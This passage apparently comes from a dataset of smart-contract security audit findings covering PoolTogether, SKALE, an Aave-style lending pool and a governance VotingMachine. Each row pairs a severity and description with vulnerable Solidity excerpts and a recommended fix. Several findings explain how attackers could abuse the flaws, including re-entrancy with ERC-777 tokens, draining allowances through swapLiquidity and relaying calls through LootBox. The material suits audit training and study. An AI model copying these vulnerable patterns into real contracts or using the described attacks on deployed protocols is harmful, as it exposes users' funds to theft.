nextRandom = nextRandom.add(ticketSplit);\\n}\\n```\\nчDo not distribute awards at fixed intervals from the initial drawing, but instead randomize the additional drawings as well.чч```\\nuint256 ticketSplit = totalSupply.div(\\_\\_numberOfWinners);\\nuint256 nextRandom = randomNumber.add(ticketSplit);\\n// the other winners receive their prizeShares\\nfor (uint256 winnerCount = 1; winnerCount < \\_\\_numberOfWinners; winnerCount++) {\\n winners[winnerCount] = ticket.draw(nextRandom);\\n nextRandom = nextRandom.add(ticketSplit);\\n}\\n```\\n -MultipleWinners - Inconsistent behavior compared to SingleRandomWinnerчlowчThe `MultipleWinners` strategy carries out award distribution to the zero address if `ticket.draw()` returns `address(0)` (indicating an error condition) while `SingleRandomWinner` does not.\\n`SingleRandomWinner` silently skips award distribution if `ticket.draw()` returns `address(0)`.\\n```\\ncontract SingleRandomWinner is PeriodicPrizeStrategy {\\n function \\_distribute(uint256 randomNumber) internal override {\\n uint256 prize = prizePool.captureAwardBalance();\\n address winner = ticket.draw(randomNumber);\\n if (winner != address(0)) {\\n \\_awardTickets(winner, prize);\\n \\_awardAllExternalTokens(winner);\\n }\\n }\\n}\\n```\\n\\n`MultipleWinners` still attempts to distribute awards if `ticket.draw()` returns `address(0)`. This may or may not succeed depending on the implementation of the tokens included in the `externalErc20s` and `externalErc721s` linked lists.\\n```\\nfunction \\_distribute(uint256 randomNumber) internal override {\\n uint256 prize = prizePool.captureAwardBalance();\\n\\n // main winner gets all external tokens\\n address mainWinner = ticket.draw(randomNumber);\\n \\_awardAllExternalTokens(mainWinner);\\n\\n address[] memory winners = new address[](\\_\\_numberOfWinners);\\n winners[0] = mainWinner;\\n```\\nчImplement consistent behavior. Avoid hiding error conditions and consider throwing an exception instead.чч```\\ncontract SingleRandomWinner is PeriodicPrizeStrategy {\\n function \\_distribute(uint256 randomNumber) internal override {\\n uint256 prize = prizePool.captureAwardBalance();\\n address winner = ticket.draw(randomNumber);\\n if (winner != address(0)) {\\n \\_awardTickets(winner, prize);\\n \\_awardAllExternalTokens(winner);\\n }\\n }\\n}\\n```\\n -Initialize implementations for proxy contracts and protect initialization methodsчlowчAny situation where the implementation of proxy contracts can be initialized by third parties should be avoided. This can be the case if the `initialize` function is unprotected or not initialized immediately after deployment. Since the implementation contract is not meant to be used directly without a proxy delegate-calling to it, it is recommended to protect the initialization method of the implementation by initializing on deployment.\\nThis affects all proxy implementations (the delegatecall target contract) deployed in the system.\\nThe implementation for `MultipleWinners` is not initialized. Even though not directly used by the system it may be initialized by a third party.\\n```\\nconstructor () public {\\n instance = new MultipleWinners();\\n}\\n```\\n\\nThe deployed `ERC721Contract` is not initialized.\\n```\\nconstructor () public {\\n erc721ControlledInstance = new ERC721Controlled();\\n erc721ControlledBytecode = MinimalProxyLibrary.minimalProxy(address(erc721ControlledInstance));\\n}\\n```\\n\\nThe deployed `LootBox` is not initialized.\\n```\\nconstructor () public {\\n lootBoxActionInstance = new LootBox();\\n lootBoxActionBytecode = MinimalProxyLibrary.minimalProxy(address(lootBoxActionInstance));\\n}\\n```\\nчInitialize unprotected implementation contracts in the implementation's constructor. Protect initialization methods from being called by unauthorized parties or ensure that deployment of the proxy and initialization is performed in the same transaction.чч```\\nconstructor () public {\\n instance = new MultipleWinners();\\n}\\n```\\n -LootBox - transferEther should be internalчlowч`LootBox.transferEther()` can be `internal` as it is only called from `LootBox.plunder()` and the LootBox(proxy) instances are generally very short-living (created and destroyed within one transaction).\\n```\\nfunction transferEther(address payable to, uint256 amount) public {\\n to.transfer(amount);\\n\\n emit TransferredEther(to, amount);\\n}\\n```\\nчRestrict transferEther()'s visibility to `internal`.чч```\\nfunction transferEther(address payable to, uint256 amount) public {\\n to.transfer(amount);\\n\\n emit TransferredEther(to, amount);\\n}\\n```\\n -LootBox - executeCalls can be misused to relay callsчlowч`LootBox` is deployed with `LootBoxController` and serves as the implementation for individual `create2` lootbox proxy contracts. None of the methods of the `LootBox` implementation contract are access restricted. A malicious actor may therefore use the `executeCalls()` method to relay arbitrary calls to other contracts on the blockchain in an attempt to disguise the origin or misuse the reputation of the `LootBox` contract (as it belongs to the PoolTogether project).\\nNote: allows non-value and value calls (deposits can be forces via selfdestruct)\\n```\\nfunction executeCalls(Call[] calldata calls) external returns (bytes[] memory) {\\n bytes[] memory response = new bytes[](calls.length);\\n for (uint256 i = 0; i < calls.length; i++) {\\n response[i] = \\_executeCall(calls[i].to, calls[i].value, calls[i].data);\\n }\\n return response;\\n}\\n```\\nчRestrict access to call forwarding functionality to trusted entities. Consider implementing the `Ownable` pattern allowing access to functionality to the owner only.чч```\\nfunction executeCalls(Call[] calldata calls) external returns (bytes[] memory) {\\n bytes[] memory response = new bytes[](calls.length);\\n for (uint256 i = 0; i < calls.length; i++) {\\n response[i] = \\_executeCall(calls[i].to, calls[i].value, calls[i].data);\\n }\\n return response;\\n}\\n```\\n -ERC20 tokens with no return value will fail to transferчhighчAlthough the ERC20 standard suggests that a transfer should return `true` on success, many tokens are non-compliant in this regard.\\nIn that case, the `.transfer()` call here will revert even if the transfer is successful, because solidity will check that the RETURNDATASIZE matches the ERC20 interface.\\n```\\nif (!instance.transfer(getSendAddress(), forwarderBalance)) {\\n revert('Could not gather ERC20');\\n}\\n```\\nчConsider using OpenZeppelin's SafeERC20.чч```\\nif (!instance.transfer(getSendAddress(), forwarderBalance)) {\\n revert('Could not gather ERC20');\\n}\\n```\\n -Delegated transactions can be executed for multiple accountsчhighчThe `Gateway` contract allows users to create meta transactions triggered by the system's backend. To do so, one of the owners of the account should sign the message in the following format:\\n```\\naddress sender = \\_hashPrimaryTypedData(\\n \\_hashTypedData(\\n nonce,\\n to,\\n data\\n )\\n).recoverAddress(senderSignature);\\n```\\n\\nThe message includes a nonce, destination address, and call data. The problem is that this message does not include the `account` address. So if the `sender` is the owner of multiple accounts, this meta transaction can be called for multiple accounts.чResolution\\nComment from the client: The issue has been solved\\nAdd the `account` field in the signed message or make sure that any address can be the owner of only one `account`.чч```\\naddress sender = \\_hashPrimaryTypedData(\\n \\_hashTypedData(\\n nonce,\\n to,\\n data\\n )\\n).recoverAddress(senderSignature);\\n```\\n -Removing an owner does not work in PersonalAccountRegistryчhighчAn owner of a personal account can be added/removed by other owners. When removing the owner, only `removedAtBlockNumber` value is updated. `accounts[account].owners[owner].added` remains true:\\n```\\naccounts[account].owners[owner].removedAtBlockNumber = block.number;\\n\\nemit AccountOwnerRemoved(\\n account,\\n owner\\n);\\n```\\n\\nBut when the account is checked whether this account is the owner, only `accounts[account].owners[owner].added` is actually checked:\\n```\\nfunction \\_verifySender(\\n address account\\n)\\n private\\n returns (address)\\n{\\n address sender = \\_getContextSender();\\n\\n if (!accounts[account].owners[sender].added) {\\n require(\\n accounts[account].salt == 0\\n );\\n\\n bytes32 salt = keccak256(\\n abi.encodePacked(sender)\\n );\\n\\n require(\\n account == \\_computeAccountAddress(salt)\\n );\\n\\n accounts[account].salt = salt;\\n accounts[account].owners[sender].added = true;\\n\\n emit AccountOwnerAdded(\\n account,\\n sender\\n );\\n }\\n\\n return sender;\\n}\\n```\\n\\nSo the owner will never be removed, because `accounts[account].owners[owner].added` will always be `true.чProperly check if the account is still the owner in the `_verifySender` function.чч```\\naccounts[account].owners[owner].removedAtBlockNumber = block.number;\\n\\nemit AccountOwnerRemoved(\\n account,\\n owner\\n);\\n```\\n -The withdrawal mechanism is overcomplicatedчmediumчTo withdraw the funds, anyone who has the account in `PaymentRegistry` should call the `withdrawDeposit` function and go through the withdrawal process. After the lockdown period (30 days), the user will withdraw all the funds from the account.\\n```\\nfunction withdrawDeposit(\\n address token\\n)\\n external\\n{\\n address owner = \\_getContextAccount();\\n uint256 lockedUntil = deposits[owner].withdrawalLockedUntil[token];\\n\\n /\\* solhint-disable not-rely-on-time \\*/\\n\\n if (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n } else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n\\n deposits[owner].withdrawalLockedUntil[token] = lockedUntil;\\n\\n emit DepositWithdrawalRequested(\\n deposits[owner].account,\\n owner,\\n token,\\n lockedUntil\\n );\\n }\\n /\\* solhint-enable not-rely-on-time \\*/\\n}\\n```\\n\\nDuring that period, everyone who has a channel with the user is forced to commit their channels or lose money from that channel. When doing so, every user will reset the initial lockdown period and the withdrawer should start the process again.\\n```\\nif (deposits[sender].withdrawalLockedUntil[token] > 0) {\\n deposits[sender].withdrawalLockedUntil[token] = 0;\\n```\\n\\nThere is no way for the withdrawer to close the channel by himself. If the withdrawer has N channels, it's theoretically possible to wait for up to N*(30 days) period and make N+2 transactions.чThere may be some minor recommendations on how to improve that without major changes:\\nWhen committing a payment channel, do not reset the lockdown period to zero. Two better option would be either not change it at all or extend to `now + depositWithdrawalLockPeriod`чч```\\nfunction withdrawDeposit(\\n address token\\n)\\n external\\n{\\n address owner = \\_getContextAccount();\\n uint256 lockedUntil = deposits[owner].withdrawalLockedUntil[token];\\n\\n /\\* solhint-disable not-rely-on-time \\*/\\n\\n if (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n } else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n\\n deposits[owner].withdrawalLockedUntil[token] = lockedUntil;\\n\\n emit DepositWithdrawalRequested(\\n deposits[owner].account,\\n owner,\\n token,\\n lockedUntil\\n );\\n }\\n /\\* solhint-enable not-rely-on-time \\*/\\n}\\n```\\n -The lockdown period shouldn't be extended when called multiple timesчlowчIn order to withdraw a deposit from the `PaymentRegistry`, the account owner should call the `withdrawDeposit` function and wait for `depositWithdrawalLockPeriod` (30 days) before actually transferring all the tokens from the account.\\nThe issue is that if the withdrawer accidentally calls it for the second time before these 30 days pass, the waiting period gets extended for 30 days again.\\n```\\nif (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n} else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n```\\nчResolution\\nComment from the client: The issue has been solved\\nOnly extend the waiting period when a withdrawal is requested for the first time.чч```\\nif (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n} else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n```\\n -Gateway can call any contract AcknowledgedчlowчResolution\\nComment from the client: That's right Gateway can call any contract, we want to keep it open for any external contract.\\nThe `Gateway` contract is used as a gateway for meta transactions and batched transactions. It can currently call any contract, while is only intended to call specific contracts in the system that implemented `GatewayRecipient` interface:\\n```\\n for (uint256 i = 0; i < data.length; i++) {\\n require(\\n to[i] != address(0)\\n );\\n\\n // solhint-disable-next-line avoid-low-level-calls\\n (succeeded,) = to[i].call(abi.encodePacked(data[i], account, sender));\\n\\n require(\\n succeeded\\n );\\n }\\n}\\n```\\n\\nThere are currently no restrictions for `to` value.чMake sure, only intended contracts can be called by the `Gateway` : `PersonalAccountRegistry`, `PaymentRegistry`, `ENSController`.чч```\\n for (uint256 i = 0; i < data.length; i++) {\\n require(\\n to[i] != address(0)\\n );\\n\\n // solhint-disable-next-line avoid-low-level-calls\\n (succeeded,) = to[i].call(abi.encodePacked(data[i], account, sender));\\n\\n require(\\n succeeded\\n );\\n }\\n}\\n```\\n -Remove unused codeчlowч```\\n return \\_deployAccount(\\n salt,\\n 0\\n );\\n}\\n\\nfunction \\_deployAccount(\\n bytes32 salt,\\n uint256 value\\n)\\n internal\\n returns (address)\\n{\\n return address(new Account{salt: salt, value: value}());\\n}\\n```\\nчIt is recommended to remove this value as there are no use cases for it at the moment, however if it is planned to be used in the future, it should be well documented in the code to prevent confusion.чч```\\n return \\_deployAccount(\\n salt,\\n 0\\n );\\n}\\n\\nfunction \\_deployAccount(\\n bytes32 salt,\\n uint256 value\\n)\\n internal\\n returns (address)\\n{\\n return address(new Account{salt: salt, value: value}());\\n}\\n```\\n -Every node gets a full validator's bountyчhighчResolution\\nThis issue is addressed in Bug/skale 3273 formula fix 435 and SKALE-3273 Fix BountyV2 populating error 438.\\nThe main change is related to how bounties are calculated for each validator. Below are a few notes on these pull requests:\\n`nodesByValidator` mapping is no longer used in the codebase and the non-zero values are deleted when `calculateBounty()` is called for a specific validator. The mapping is kept in the code for compatible storage layout in upgradable proxies.\\nSome functions such as `populate()` was developed for the transition to the upgraded contracts (rewrite `_effectiveDelegatedSum` values based on the new calculation formula). This function is not part of this review and will be removed in the future updates.\\nUnlike the old architecture, `nodesByValidator[validatorId]` is no longer used within the system to calculate `_effectiveDelegatedSum` and bounties. This is replaced by using overall staked amount and duration.\\nIf a validator does not claim their bounty during a month, it is considered as a misbehave and her bounty goes to the bounty pool for the next month.\\nTo get the bounty, every node calls the `getBounty` function of the `SkaleManager` contract. This function can be called once per month. The size of the bounty is defined in the `BountyV2` contract in the `_calculateMaximumBountyAmount` function:\\n```\\nreturn epochPoolSize\\n .add(\\_bountyWasPaidInCurrentEpoch)\\n .mul(\\n delegationController.getAndUpdateEffectiveDelegatedToValidator(\\n nodes.getValidatorId(nodeIndex),\\n currentMonth\\n )\\n )\\n .div(effectiveDelegatedSum);\\n```\\n\\nThe problem is that this amount actually represents the amount that should be paid to the validator of that node. But each node will get this amount. Additionally, the amount of validator's bounty should also correspond to the number of active nodes, while this formula only uses the amount of delegated funds.чEvery node should get only their parts of the bounty.чч```\\nreturn epochPoolSize\\n .add(\\_bountyWasPaidInCurrentEpoch)\\n .mul(\\n delegationController.getAndUpdateEffectiveDelegatedToValidator(\\n nodes.getValidatorId(nodeIndex),\\n currentMonth\\n )\\n )\\n .div(effectiveDelegatedSum);\\n```\\n -A node exit prevents some other nodes from exiting for some period PendingчmediumчWhen a node wants to exit, the `nodeExit` function should be called as many times, as there are schains in the node. Each time one schain is getting removed from the node. During every call, all the active schains are getting frozen for 12 hours.\\n```\\nfunction freezeSchains(uint nodeIndex) external allow(\"SkaleManager\") {\\n SchainsInternal schainsInternal = SchainsInternal(contractManager.getContract(\"SchainsInternal\"));\\n bytes32[] memory schains = schainsInternal.getActiveSchains(nodeIndex);\\n for (uint i = 0; i < schains.length; i++) {\\n Rotation memory rotation = rotations[schains[i]];\\n if (rotation.nodeIndex == nodeIndex && now < rotation.freezeUntil) {\\n continue;\\n }\\n string memory schainName = schainsInternal.getSchainName(schains[i]);\\n string memory revertMessage = \"Node cannot rotate on Schain \";\\n revertMessage = revertMessage.strConcat(schainName);\\n revertMessage = revertMessage.strConcat(\", occupied by Node \");\\n revertMessage = revertMessage.strConcat(rotation.nodeIndex.uint2str());\\n string memory dkgRevert = \"DKG process did not finish on schain \";\\n ISkaleDKG skaleDKG = ISkaleDKG(contractManager.getContract(\"SkaleDKG\"));\\n require(\\n skaleDKG.isLastDKGSuccessful(keccak256(abi.encodePacked(schainName))),\\n dkgRevert.strConcat(schainName));\\n require(rotation.freezeUntil < now, revertMessage);\\n \\_startRotation(schains[i], nodeIndex);\\n }\\n}\\n```\\n\\nBecause of that, no other node that is running one of these schains can exit during that period. In the worst-case scenario, one malicious node has 128 Schains and calls `nodeExit` every 12 hours. That means that some nodes will not be able to exit for 64 days.чMake node exiting process less synchronous.чч```\\nfunction freezeSchains(uint nodeIndex) external allow(\"SkaleManager\") {\\n SchainsInternal schainsInternal = SchainsInternal(contractManager.getContract(\"SchainsInternal\"));\\n bytes32[] memory schains = schainsInternal.getActiveSchains(nodeIndex);\\n for (uint i = 0; i < schains.length; i++) {\\n Rotation memory rotation = rotations[schains[i]];\\n if (rotation.nodeIndex == nodeIndex && now < rotation.freezeUntil) {\\n continue;\\n }\\n string memory schainName = schainsInternal.getSchainName(schains[i]);\\n string memory revertMessage = \"Node cannot rotate on Schain \";\\n revertMessage = revertMessage.strConcat(schainName);\\n revertMessage = revertMessage.strConcat(\", occupied by Node \");\\n revertMessage = revertMessage.strConcat(rotation.nodeIndex.uint2str());\\n string memory dkgRevert = \"DKG process did not finish on schain \";\\n ISkaleDKG skaleDKG = ISkaleDKG(contractManager.getContract(\"SkaleDKG\"));\\n require(\\n skaleDKG.isLastDKGSuccessful(keccak256(abi.encodePacked(schainName))),\\n dkgRevert.strConcat(schainName));\\n require(rotation.freezeUntil < now, revertMessage);\\n \\_startRotation(schains[i], nodeIndex);\\n }\\n}\\n```\\n -Removing a node require multiple transactions and may be very expensive PendingчmediumчWhen removing a node from the network, the owner should redistribute all the schains that are currently on that node to the other nodes. To do so, the validator should call the `nodeExit` function of the `SkaleManager` contract. In this function, only one schain is going to be removed from the node. So the node would have to call the `nodeExit` function as many times as there are schains in the node. Every call iterates over every potential node that can be used as a replacement (like in https://github.com/ConsenSys/skale-network-audit-2020-10/issues/3).\\nIn addition to that, the first call will iterate over all schains in the node, make 4 SSTORE operations and external calls for each schain:\\n```\\nfunction \\_startRotation(bytes32 schainIndex, uint nodeIndex) private {\\n ConstantsHolder constants = ConstantsHolder(contractManager.getContract(\"ConstantsHolder\"));\\n rotations[schainIndex].nodeIndex = nodeIndex;\\n rotations[schainIndex].newNodeIndex = nodeIndex;\\n rotations[schainIndex].freezeUntil = now.add(constants.rotationDelay());\\n waitForNewNode[schainIndex] = true;\\n}\\n```\\n\\nThis may hit the block gas limit even easier than issue 5.4.\\nIf the first transaction does not hit the block's gas limit, the maximum price of deleting a node would be BLOCK_GAS_COST * 128. At the moment, it's around $50,000.чOptimize the process of deleting a node, so it can't hit the gas limit in one transaction, and the overall price should be cheaper.чч```\\nfunction \\_startRotation(bytes32 schainIndex, uint nodeIndex) private {\\n ConstantsHolder constants = ConstantsHolder(contractManager.getContract(\"ConstantsHolder\"));\\n rotations[schainIndex].nodeIndex = nodeIndex;\\n rotations[schainIndex].newNodeIndex = nodeIndex;\\n rotations[schainIndex].freezeUntil = now.add(constants.rotationDelay());\\n waitForNewNode[schainIndex] = true;\\n}\\n```\\n -Adding a new schain may potentially hit the gas limit PendingчmediumчWhen adding a new schain, a group of random 16 nodes is randomly selected to run that schain. In order to do so, the `_generateGroup` function iterates over all the nodes that can be used for that purpose:\\n```\\nfunction \\_generateGroup(bytes32 schainId, uint numberOfNodes) private returns (uint[] memory nodesInGroup) {\\n Nodes nodes = Nodes(contractManager.getContract(\"Nodes\"));\\n uint8 space = schains[schainId].partOfNode;\\n nodesInGroup = new uint[](numberOfNodes);\\n\\n uint[] memory possibleNodes = isEnoughNodes(schainId);\\n require(possibleNodes.length >= nodesInGroup.length, \"Not enough nodes to create Schain\");\\n uint ignoringTail = 0;\\n uint random = uint(keccak256(abi.encodePacked(uint(blockhash(block.number.sub(1))), schainId)));\\n for (uint i = 0; i < nodesInGroup.length; ++i) {\\n uint index = random % (possibleNodes.length.sub(ignoringTail));\\n uint node = possibleNodes[index];\\n nodesInGroup[i] = node;\\n \\_swap(possibleNodes, index, possibleNodes.length.sub(ignoringTail).sub(1));\\n ++ignoringTail;\\n\\n \\_exceptionsForGroups[schainId][node] = true;\\n addSchainForNode(node, schainId);\\n require(nodes.removeSpaceFromNode(node, space), \"Could not remove space from Node\");\\n }\\n```\\n\\nIf the total number of nodes exceeds around a few thousands, adding a schain may hit the block gas limit.чAvoid iterating over all nodes when selecting a random node for a schain.чч```\\nfunction \\_generateGroup(bytes32 schainId, uint numberOfNodes) private returns (uint[] memory nodesInGroup) {\\n Nodes nodes = Nodes(contractManager.getContract(\"Nodes\"));\\n uint8 space = schains[schainId].partOfNode;\\n nodesInGroup = new uint[](numberOfNodes);\\n\\n uint[] memory possibleNodes = isEnoughNodes(schainId);\\n require(possibleNodes.length >= nodesInGroup.length, \"Not enough nodes to create Schain\");\\n uint ignoringTail = 0;\\n uint random = uint(keccak256(abi.encodePacked(uint(blockhash(block.number.sub(1))), schainId)));\\n for (uint i = 0; i < nodesInGroup.length; ++i) {\\n uint index = random % (possibleNodes.length.sub(ignoringTail));\\n uint node = possibleNodes[index];\\n nodesInGroup[i] = node;\\n \\_swap(possibleNodes, index, possibleNodes.length.sub(ignoringTail).sub(1));\\n ++ignoringTail;\\n\\n \\_exceptionsForGroups[schainId][node] = true;\\n addSchainForNode(node, schainId);\\n require(nodes.removeSpaceFromNode(node, space), \"Could not remove space from Node\");\\n }\\n```\\n -Re-entrancy attacks with ERC-777чlowчSome tokens may allow users to perform re-entrancy while calling the `transferFrom` function. For example, it would be possible for an attacker to “borrow” a large amount of ERC-777 tokens from the lending pool by re-entering the `deposit` function from within `transferFrom`.\\n```\\nfunction deposit(\\n address asset,\\n uint256 amount,\\n address onBehalfOf,\\n uint16 referralCode\\n) external override {\\n \\_whenNotPaused();\\n ReserveLogic.ReserveData storage reserve = \\_reserves[asset];\\n\\n ValidationLogic.validateDeposit(reserve, amount);\\n\\n address aToken = reserve.aTokenAddress;\\n\\n reserve.updateState();\\n reserve.updateInterestRates(asset, aToken, amount, 0);\\n\\n bool isFirstDeposit = IAToken(aToken).balanceOf(onBehalfOf) == 0;\\n if (isFirstDeposit) {\\n \\_usersConfig[onBehalfOf].setUsingAsCollateral(reserve.id, true);\\n }\\n\\n IAToken(aToken).mint(onBehalfOf, amount, reserve.liquidityIndex);\\n\\n //transfer to the aToken contract\\n IERC20(asset).safeTransferFrom(msg.sender, aToken, amount);\\n\\n emit Deposit(asset, msg.sender, onBehalfOf, amount, referralCode);\\n}\\n```\\n\\nBecause the `safeTransferFrom` call is happening at the end of the `deposit` function, the `deposit` will be fully processed before the tokens are actually transferred.\\nSo at the beginning of the transfer, the attacker can re-enter the call to withdraw their deposit. The withdrawal will succeed even though the attacker's tokens have not yet been transferred to the lending pool. Essentially, the attacker is granted a flash-loan but without paying fees.\\nAdditionally, after these calls, interest rates will be skewed because interest rate update relies on the actual current balance.\\nRemediation\\nDo not whitelist ERC-777 or other re-entrable tokens to prevent this kind of attack.чResolution\\nThe issue was partially mitigated in `deposit` function by minting AToken before the transfer of the `deposit` token.чч```\\nfunction deposit(\\n address asset,\\n uint256 amount,\\n address onBehalfOf,\\n uint16 referralCode\\n) external override {\\n \\_whenNotPaused();\\n ReserveLogic.ReserveData storage reserve = \\_reserves[asset];\\n\\n ValidationLogic.validateDeposit(reserve, amount);\\n\\n address aToken = reserve.aTokenAddress;\\n\\n reserve.updateState();\\n reserve.updateInterestRates(asset, aToken, amount, 0);\\n\\n bool isFirstDeposit = IAToken(aToken).balanceOf(onBehalfOf) == 0;\\n if (isFirstDeposit) {\\n \\_usersConfig[onBehalfOf].setUsingAsCollateral(reserve.id, true);\\n }\\n\\n IAToken(aToken).mint(onBehalfOf, amount, reserve.liquidityIndex);\\n\\n //transfer to the aToken contract\\n IERC20(asset).safeTransferFrom(msg.sender, aToken, amount);\\n\\n emit Deposit(asset, msg.sender, onBehalfOf, amount, referralCode);\\n}\\n```\\n -Attacker can abuse swapLiquidity function to drain users' fundsчmediumчThe `swapLiquidity` function allows liquidity providers to atomically swap their collateral. The function takes a receiverAddressargument that normally points to an `ISwapAdapter` implementation trusted by the user.\\n```\\nvars.fromReserveAToken.burn(\\n msg.sender,\\n receiverAddress,\\n amountToSwap,\\n fromReserve.liquidityIndex\\n);\\n// Notifies the receiver to proceed, sending as param the underlying already transferred\\nISwapAdapter(receiverAddress).executeOperation(\\n fromAsset,\\n toAsset,\\n amountToSwap,\\n address(this),\\n params\\n);\\n\\nvars.amountToReceive = IERC20(toAsset).balanceOf(receiverAddress);\\nif (vars.amountToReceive != 0) {\\n IERC20(toAsset).transferFrom(\\n receiverAddress,\\n address(vars.toReserveAToken),\\n vars.amountToReceive\\n );\\n\\n if (vars.toReserveAToken.balanceOf(msg.sender) == 0) {\\n \\_usersConfig[msg.sender].setUsingAsCollateral(toReserve.id, true);\\n }\\n\\n vars.toReserveAToken.mint(msg.sender, vars.amountToReceive, toReserve.liquidityIndex);\\n```\\n\\nHowever, since an attacker can pass any address as the `receiverAddress`, they can arbitrarily transfer funds from other contracts that have given allowances to the `LendingPool` contract (for example, another ISwapAdapter).\\nThe `amountToSwap` is defined by the caller and can be very small. The attacker gets the difference between `IERC20(toAsset).balanceOf(receiverAddress)` value of `toAsset` and the `amountToSwap` of `fromToken`.\\nRemediation\\nEnsure that no funds can be stolen from contracts that have granted allowances to the `LendingPool` contract.чResolution\\nSolved by removing `swapLiquidity` functionality.чч```\\nvars.fromReserveAToken.burn(\\n msg.sender,\\n receiverAddress,\\n amountToSwap,\\n fromReserve.liquidityIndex\\n);\\n// Notifies the receiver to proceed, sending as param the underlying already transferred\\nISwapAdapter(receiverAddress).executeOperation(\\n fromAsset,\\n toAsset,\\n amountToSwap,\\n address(this),\\n params\\n);\\n\\nvars.amountToReceive = IERC20(toAsset).balanceOf(receiverAddress);\\nif (vars.amountToReceive != 0) {\\n IERC20(toAsset).transferFrom(\\n receiverAddress,\\n address(vars.toReserveAToken),\\n vars.amountToReceive\\n );\\n\\n if (vars.toReserveAToken.balanceOf(msg.sender) == 0) {\\n \\_usersConfig[msg.sender].setUsingAsCollateral(toReserve.id, true);\\n }\\n\\n vars.toReserveAToken.mint(msg.sender, vars.amountToReceive, toReserve.liquidityIndex);\\n```\\n -VotingMachine - tryToMoveToValidating can lock up proposalsчhighчAfter a vote was received, the proposal can move to a validating state if any of the votes pass the proposal's `precReq` value, referred to as the minimum threshold.\\n```\\ntryToMoveToValidating(\\_proposalId);\\n```\\n\\nInside the method `tryToMoveToValidating` each of the vote options are checked to see if they pass `precReq`. In case that happens, the proposal goes into the next stage, specifically `Validating`.\\n```\\n/// @notice Function to move to Validating the proposal in the case the last vote action\\n/// was done before the required votingBlocksDuration passed\\n/// @param \\_proposalId The id of the proposal\\nfunction tryToMoveToValidating(uint256 \\_proposalId) public {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.proposalStatus == ProposalStatus.Voting, \"VOTING\\_STATUS\\_REQUIRED\");\\n if (\\_proposal.currentStatusInitBlock.add(\\_proposal.votingBlocksDuration) <= block.number) {\\n for (uint256 i = 0; i <= COUNT\\_CHOICES; i++) {\\n if (\\_proposal.votes[i] > \\_proposal.precReq) {\\n internalMoveToValidating(\\_proposalId);\\n }\\n }\\n }\\n}\\n```\\n\\nThe method `internalMoveToValidating` checks the proposal's status to be `Voting` and proceeds to moving the proposal into `Validating` state.\\n```\\n/// @notice Internal function to change proposalStatus from Voting to Validating\\n/// @param \\_proposalId The id of the proposal\\nfunction internalMoveToValidating(uint256 \\_proposalId) internal {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.proposalStatus == ProposalStatus.Voting, \"ONLY\\_ON\\_VOTING\\_STATUS\");\\n \\_proposal.proposalStatus = ProposalStatus.Validating;\\n \\_proposal.currentStatusInitBlock = block.number;\\n emit StatusChangeToValidating(\\_proposalId);\\n}\\n```\\n\\nThe problem appears if multiple vote options go past the minimum threshold. This is because the loop does not stop after the first found option and the loop will fail when the method `internalMoveToValidating` is called a second time.\\n```\\nfor (uint256 i = 0; i <= COUNT\\_CHOICES; i++) {\\n if (\\_proposal.votes[i] > \\_proposal.precReq) {\\n internalMoveToValidating(\\_proposalId);\\n }\\n}\\n```\\n\\nThe method `internalMoveToValidating` fails the second time because the first time it is called, the proposal goes into the `Validating` state and the second time it is called, the require check fails.\\n```\\nrequire(\\_proposal.proposalStatus == ProposalStatus.Voting, \"ONLY\\_ON\\_VOTING\\_STATUS\");\\n\\_proposal.proposalStatus = ProposalStatus.Validating;\\n```\\n\\nThis can lead to proposal lock-ups if there are enough votes to at least one option that pass the minimum threshold.чAfter moving to the `Validating` state return successfully.\\n```\\nfunction tryToMoveToValidating(uint256 \\_proposalId) public {\\n Proposal storage \\_proposal = proposals[\\_proposalId];\\n require(\\_proposal.proposalStatus == ProposalStatus.Voting, \"VOTING\\_STATUS\\_REQUIRED\");\\n if (\\_proposal.currentStatusInitBlock.add(\\_proposal.votingBlocksDuration) <= block.number) {\\n for (uint256 i = 0; i <= COUNT\\_CHOICES; i++) {\\n if (\\_proposal.votes[i] > \\_proposal.precReq) {\\n 